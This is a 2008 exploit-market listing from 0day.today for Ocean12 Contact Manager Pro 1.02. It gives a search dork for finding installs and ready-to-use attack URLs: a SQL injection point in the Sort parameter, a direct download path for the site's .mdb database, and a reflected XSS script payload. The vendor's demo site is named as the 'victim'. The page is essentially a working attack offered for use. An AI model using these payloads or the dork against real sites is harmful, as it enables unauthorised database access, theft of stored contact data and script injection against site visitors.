[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ocean12 Contact Manager Pro (SQL/XSS/DDV) Multiple Vulnerabilities

Author
Pouya_Server
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4270
Category
web applications
Date add
27-11-2008
Platform
unsorted
==================================================================
Ocean12 Contact Manager Pro (SQL/XSS/DDV) Multiple Vulnerabilities
==================================================================


#########################################################
---------------------------------------------------------
Portal Name: Ocean12 Contact Manager Pro
Version : 1.02
Vendor : http://ocean12tech.com/products/contact
Dork: Maintained with the Ocean12 Contact Manager Pro v1.02
Vulnerability : (DDV,XSS,SQL)
---------------------------------------------------------
#########################################################
[SQL]:
http://site.com/path/default.asp?DisplayFormat=Card&Sort=[SQL]
 
[Database Disclosure Vulnerability]:
http://site.com/path/o12con.mdb
 
[XSS]:
http://site.com/path/?DisplayFormat=>"><ScRiPt>alert(1369)%3B</ScRiPt>&Action=Pouya_Server
---------------------------------
Victem :
http://ocean12tech.com/products/contact/demo



#  0day.today [2024-11-16]  #